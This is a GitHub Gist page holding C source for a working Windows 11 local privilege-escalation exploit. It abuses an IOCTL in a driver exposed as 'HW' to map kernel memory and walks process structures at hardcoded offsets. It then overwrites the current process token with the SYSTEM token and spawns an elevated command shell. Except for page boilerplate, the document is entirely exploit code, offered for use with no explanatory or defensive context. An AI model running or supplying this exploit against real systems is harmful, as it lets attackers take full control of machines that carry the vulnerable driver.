-
-
Save xct/7d192b448793fc6decb4b59c5382bd61 to your computer and use it in GitHub Desktop.
MTS HW EOP
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "windows.h" | |
#include <stdio.h> | |
// Author: @xct_de | |
// Target: Windows 11 (10.0.22000) | |
#define QWORD ULONGLONG | |
#define IOCTL_01 0x9C406500 | |
#define SystemHandleInformation 0x10 | |
#define SystemHandleInformationSize 1024 * 1024 * 2 | |
using fNtQuerySystemInformation = NTSTATUS(WINAPI*)( | |
ULONG SystemInformationClass, | |
PVOID SystemInformation, | |
ULONG SystemInformationLength, | |
PULONG ReturnLength | |
); | |
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { | |
USHORT UniqueProcessId; | |
USHORT CreatorBackTraceIndex; | |
UCHAR ObjectTypeIndex; | |
UCHAR HandleAttributes; | |
USHORT HandleValue; | |
PVOID Object; | |
ULONG GrantedAccess; | |
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO; | |
typedef struct _SYSTEM_HANDLE_INFORMATION { | |
ULONG NumberOfHandles; | |
SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1]; | |
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION; | |
typedef NTSTATUS(NTAPI* _NtQueryIntervalProfile)( | |
DWORD ProfileSource, | |
PULONG Interval | |
); | |
QWORD getSystemEProcess() { | |
ULONG returnLenght = 0; | |
fNtQuerySystemInformation NtQuerySystemInformation = (fNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll"), "NtQuerySystemInformation"); | |
PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize); | |
NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLenght); | |
SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[0]; | |
return (QWORD)handleInfo.Object; | |
} | |
QWORD mapArbMem(QWORD addr, HANDLE hDriver) { | |
DWORD index = 0; | |
DWORD bytesWritten = 0; | |
LPVOID uInBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); | |
LPVOID uOutBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); | |
QWORD* in = (QWORD*)((QWORD)uInBuf); | |
*(in + index++) = 0x4141414142424242; | |
*(in + index++) = 0x4343434300001000; // size | |
*(in + index++) = addr; // addr | |
DeviceIoControl(hDriver, IOCTL_01, (LPVOID)uInBuf, 0x1000, uOutBuf, 0x1000, &bytesWritten, NULL); | |
QWORD* out = (QWORD*)((QWORD)uOutBuf); | |
QWORD mapped = *(out + 2); | |
return mapped; | |
} | |
int main() { | |
HANDLE hDriver = CreateFile(L"\\\\.\\HW", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); | |
if (hDriver == INVALID_HANDLE_VALUE) | |
{ | |
printf("[!] Error while creating a handle to the driver: %d\n", GetLastError()); | |
exit(1); | |
} | |
printf("[>] Exploiting driver..\n"); | |
QWORD systemProc = getSystemEProcess(); | |
QWORD systemProcMap = mapArbMem(systemProc, hDriver); | |
QWORD systemToken = (QWORD)(*(QWORD*)(systemProcMap + 0x4b8)); | |
printf("[>] System Token: 0x%llx\n", systemToken); | |
DWORD currentProcessPid = GetCurrentProcessId(); | |
BOOL found = false; | |
QWORD cMapping = systemProcMap; | |
DWORD cPid = 0; | |
QWORD cTokenPtr = 0; | |
while (!found) { | |
QWORD readAt = (QWORD)(*(QWORD*)(cMapping + 0x448)); | |
cMapping = mapArbMem(readAt - 0x448, hDriver); | |
cPid = (DWORD)(*(DWORD*)(cMapping + 0x440)); | |
cTokenPtr = (QWORD)(*(QWORD*)(cMapping + 0x4b8)); | |
if (cPid == currentProcessPid) { | |
found = true; | |
break; | |
} | |
} | |
if (!found) { | |
exit(-1); | |
} | |
printf("[>] Stealing Token..\n"); | |
*(QWORD*)(cMapping + 0x4b8) = systemToken; | |
system("cmd"); | |
printf("[>] Restoring Token..\n"); | |
*(QWORD*)(cMapping + 0x4b8) = cTokenPtr; | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment